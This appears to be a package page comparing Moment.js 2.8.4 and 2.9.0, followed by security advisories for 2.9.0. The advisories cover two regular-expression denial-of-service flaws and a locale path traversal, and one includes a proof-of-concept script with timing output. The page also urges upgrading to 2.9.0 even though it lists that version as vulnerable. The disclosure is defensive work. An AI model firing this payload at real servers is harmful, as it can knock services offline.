Moment.js saw a minor version bump from 2.8.4 to 2.9.0, representing incremental updates to this widely-used JavaScript date manipulation library. Both versions share the core functionality of parsing, validating, manipulating, and displaying dates, making them essential tools for developers handling date and time operations in web applications. Key developer information such as the GitHub repository, author (Iskren Ivov Chernev), and distribution method (tarball via npm registry) remain consistent across both releases.
Examining the development dependencies reveals subtle differences. While most dependencies are retained and potentially updated to their "latest" versions, a notable change is the addition of grunt-exec and grunt-nuget in version 2.9.0, along with more specific versions for tools such as grunt-jscs. The older 2.8.4 version defined this dependency as version 0.7.1 versus the lack of specification in the newer release; This suggests potential enhancements in the build process, such as improved code quality checks (grunt-jscs), automated execution of system commands (grunt-exec), and potentially NuGet package management integration (grunt-nuget), although precise details would require further investigation. Developers should consider upgrading to 2.9.0 to benefit from these potentially improved build and testing workflows, securing a more robust and well-maintained library within their projects. The release dates indicate several weeks of development and possible bug fixes occurring between versions.
All the vulnerabilities related to the version 2.9.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: